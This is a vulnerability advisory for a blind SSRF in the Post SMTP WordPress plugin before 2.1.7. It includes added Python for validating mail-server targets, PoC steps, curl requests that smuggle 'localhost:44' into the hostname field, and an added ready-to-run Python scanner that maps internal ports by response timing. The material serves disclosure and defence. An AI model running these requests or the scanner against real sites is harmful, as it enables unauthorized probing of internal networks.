Post SMTP < 2.1.7 - Admin+ Blind SSRF

WPVDB-ID: DC99AC40-646A-4F8E-B2B9-DC55D6D4C55C
Published: Sep 05, 2022
Reporter: Raad Haddad of Cloudyrion GmbH
Source: wpscan.com
10
Tags: post smtp, vulnerability, admin ssrf

EPSS: 0.001 (Low), percentile 43.1%

The plugin does not perform proper authorisation checks in some of its AJAX actions (the postman_test_port and postman_test_smtps handlers used in the PoC), which lets high-privilege users such as administrators make the web server open a TCP connection to an arbitrary host and port and infer from the response time whether that port is open. This is a blind SSRF: no response content is returned, only timing. It is most relevant on multisite installations, for example, where site administrators are not necessarily trusted with network access from the server.
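As an added example that is not part of this advisory or of the Post SMTP plugin's code, the Python below shows the kind of target validation a "test my mail server" handler should apply in addition to the authorisation check the advisory says is missing. It rejects the host:port smuggling the PoC relies on (localhost:44 submitted as a hostname) and any target that is, or resolves to, a loopback, private, link-local or otherwise non-public address. The function name validate_smtp_target, the allowed-port set and the injectable resolver are assumptions made for illustration; the plugin itself is PHP, and this is not the 2.1.7 fix.

```python
"""Added example, not advisory or Post SMTP code: SSRF target validation for
a mail-server test handler. The interface (validate_smtp_target, the
ALLOWED_PORTS set, the injectable resolver) is assumed for illustration."""
import ipaddress
import re
import socket
from typing import Callable, List

# RFC 1123 hostname: letter/digit/hyphen labels joined by dots. No colon is
# permitted, so the PoC's "localhost:44" smuggled into the hostname field
# fails this check before anything is resolved or connected to.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?"
    r"(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$", re.I)
ALLOWED_PORTS = {25, 465, 587}  # assumption: the only ports an SMTP test needs


def system_resolver(host: str) -> List[str]:
    """Resolve with the OS resolver and return every address, so a name that
    answers with one public and one internal address is still caught."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _non_public(ip: str) -> bool:
    """True for loopback, RFC 1918, link-local (cloud metadata), reserved,
    multicast and unspecified addresses; IPv4-mapped IPv6 is unwrapped first."""
    addr = ipaddress.ip_address(ip)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


def validate_smtp_target(hostname: str, port: int,
                         resolver: Callable[[str], List[str]] = system_resolver) -> str:
    """Return "ok" if (hostname, port) is an acceptable outbound SMTP target,
    otherwise a short rejection reason. Never raises on attacker input."""
    host = hostname.strip().lower().rstrip(".")
    if not host:
        return "empty hostname"
    if port not in ALLOWED_PORTS:
        return f"port {port} not allowed"
    # A bracketed IPv6 literal or a plain IP literal is checked directly.
    literal = host[1:-1] if host.startswith("[") and host.endswith("]") else host
    try:
        ipaddress.ip_address(literal)
        ips, host = [literal], literal
    except ValueError:
        # Not an IP literal: it must be a well-formed hostname, and the
        # address check happens *after* resolution so aliases for internal
        # hosts and odd spellings (decimal 2130706433, etc.) cannot slip by.
        if not HOSTNAME_RE.match(host):
            return "malformed hostname"
        try:
            ips = resolver(host)
        except OSError:
            ips = []
        if not ips:
            return "hostname does not resolve"
    for ip in ips:
        try:
            bad = _non_public(ip)
        except ValueError:
            return f"resolver returned non-IP {ip!r}"
        if bad:
            return f"{host} points to non-public address {ip}"
    return "ok"


if __name__ == "__main__":
    # Constructed inputs: the PoC's smuggled value, loopback, metadata IP.
    for target in ("localhost:44", "localhost", "169.254.169.254", "smtp.example.com"):
        print(f"{target:20} -> {validate_smtp_target(target, 25)}")
```

The check is deliberately deny-by-default on the resolved addresses rather than on the submitted string: a plugin that only blocks the literal "localhost" is bypassed by 127.0.0.2, an IPv4-mapped IPv6 literal, or a DNS name the attacker controls that points at 10.0.0.0/8. Note that resolving here and again when connecting leaves a DNS-rebinding window; pinning the connection to the validated address closes it.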

PoC

1. Navigate to https://example.com/wp-admin/admin.php?page=postman%2Fport_test
2. In the "Outgoing Mail Server Hostname" field, enter the target host and port, e.g. localhost:44
3. If the test takes noticeably longer to return its results, the port is open.

Equivalent curl requests (WP COOKIES stands for an authenticated admin session cookie):

curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php?_fs_blog_admin=true' -X POST -H 'Cookie: WP COOKIES' --data 'action=postman_test_smtps&hostname=localhost%3A44&port=465&security=6b297e1647'

curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php?_fs_blog_admin=true' -X POST -H 'Cookie: WP COOKIES' --data 'action=postman_test_port&hostname=localhost%3A1338&port=25&security=6b297e1647'
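The following Python is an added example, not code from the advisory, WPScan or the Post SMTP project: it automates the timing-based port probe the PoC describes. The request fields and the _fs_blog_admin=true query string are copied from the curl commands above; everything else is an assumption of this example: the operator supplies the site URL, an admin session cookie string and their own value for the security parameter (6b297e1647 in the PoC is presumably specific to the reporter's session), and a port assumed to be closed (default 1) provides the closed-port timing baseline. The sender is injectable so the inference logic can be exercised offline.

```python
"""Added example (not advisory, WPScan or Post SMTP code): automate the
timing-based blind SSRF port probe from the PoC. Assumed inputs: site URL,
admin cookie string, the caller's own `security` value, a closed baseline port."""
import sys
import time
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable

AJAX_PATH = "/wp-admin/admin-ajax.php?_fs_blog_admin=true"
# action -> value the PoC sent in the separate `port` field alongside hostname
ACTIONS = {"postman_test_port": "25", "postman_test_smtps": "465"}


def build_body(target_host: str, target_port: int, nonce: str,
               action: str = "postman_test_port") -> str:
    """Form-encode the POST body exactly as in the PoC: the probed host:port is
    smuggled through the `hostname` field, `port` carries the PoC's value."""
    if action not in ACTIONS:
        raise ValueError(f"unknown action {action!r}")
    return urllib.parse.urlencode({
        "action": action,
        "hostname": f"{target_host}:{target_port}",
        "port": ACTIONS[action],
        "security": nonce,
    })


def http_sender(site: str, cookie: str, timeout: float = 60.0) -> Callable[[str], float]:
    """Return a function that POSTs a body as the admin and reports the
    wall-clock seconds the request took: the only signal in a blind SSRF."""
    url = site.rstrip("/") + AJAX_PATH

    def send(body: str) -> float:
        req = urllib.request.Request(
            url, data=body.encode(), method="POST",
            headers={"Cookie": cookie,
                     "Content-Type": "application/x-www-form-urlencoded"})
        start = time.monotonic()
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                resp.read()
        except Exception:
            pass  # a timeout or an error page still carries timing information
        return time.monotonic() - start
    return send


def classify(elapsed: float, baseline: float, slow_factor: float = 3.0) -> str:
    """PoC logic: a response much slower than the closed-port baseline means
    the server's socket connected and then sat waiting, i.e. the port is open.
    The baseline is floored so a near-zero measurement cannot flag everything."""
    return "open" if elapsed >= max(baseline, 0.05) * slow_factor else "closed"


def scan(send: Callable[[str], float], nonce: str, host: str,
         ports: Iterable[int], baseline_port: int = 1,
         action: str = "postman_test_port") -> Dict[int, str]:
    """Probe each port through the SSRF and label it open/closed by timing."""
    baseline = send(build_body(host, baseline_port, nonce, action))
    return {p: classify(send(build_body(host, p, nonce, action)), baseline)
            for p in ports}


if __name__ == "__main__":
    # usage: python3 probe.py https://vulnerable-site.tld "COOKIE STRING" NONCE localhost 22 80 443
    site, cookie, nonce, host, *port_args = sys.argv[1:]
    for port, state in scan(http_sender(site, cookie), nonce, host, map(int, port_args)).items():
        print(f"{host}:{port} {state}")
```

The timing threshold is relative to a measured baseline rather than a fixed number of seconds because the plugin's connect timeout and the server's latency are unknown; re-measure the baseline if the site is under variable load, and remember that a firewall that silently drops packets makes a filtered port look "open" under this heuristic.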

Affected versions (CPE)
Name: post-smtp
Operator: lt
Version: 2.1.7 (all versions before 2.1.7 are affected)

